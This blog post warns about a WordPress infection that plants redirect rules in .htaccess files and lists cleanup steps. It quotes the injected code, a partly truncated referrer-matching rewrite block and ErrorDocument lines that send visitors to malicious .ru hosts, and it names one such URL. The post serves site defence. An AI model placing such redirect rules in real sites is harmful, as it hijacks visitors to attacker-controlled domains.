WordPress Malware?

There is an interesting MALWARE going around in the last couple of weeks. It appears to be a MySQL injection that can infiltrate .htaccess files not ony on a WordPress install but any other 3rd party software you may have on your server. On some servers this might be hard to detect so keep an eye out for slow loading pages and look at the status bar as you will see it will try to redirect you. http://bannortim-qimulta.ru/industry/index.php

It adds a lot of redirects in your .htaccess and looks like this.

———————–
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler
|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport
|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9
|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|f…..

and then some.

You also have to check the end of your file as it adds blank lines and then starts up with more malware redirects.

ErrorDocument 400 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 401 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 403 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 404 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 500 http://qimulta-bannortim.ru/upday/index.php

———————-

If you remove this from your .htaccess it will often times reappear.

Recommendation:

  • Remove your MySQL user that is connected to your database
  • Put your site offline, and start looking at your database in PHPMyAdmin for malicious code to remove.
  • Create a new MySQL user and rename your database.
  • Update your WordPress install and your plugins/themes.  Research your plugins/themes for known attacks.
  • Check your .htaccess file – remove hack redirects.
  • Check above your public_html directory (home directory) as it can put an .htaccess file there too.
  • Check with your host for a solution if you have a good one.  We use SimpleHelix and have had good luck and good support.
  • All else fails, export your posts and pages and reinstall WordPress with latest updates and latest theme and plugin updates.

It looks like the cause is an outdated WordPress install or WordPress Plugins/Themes so some of these sites might help you figure it out.

http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked
http://wordpress.org/support/topic/was-our-website-hacked-please-help
http://sucuri.net/global
http://www.google.co.uk/support/forum/p/Webmasters/thread?tid=4c051eb8c6e2e972&hl=en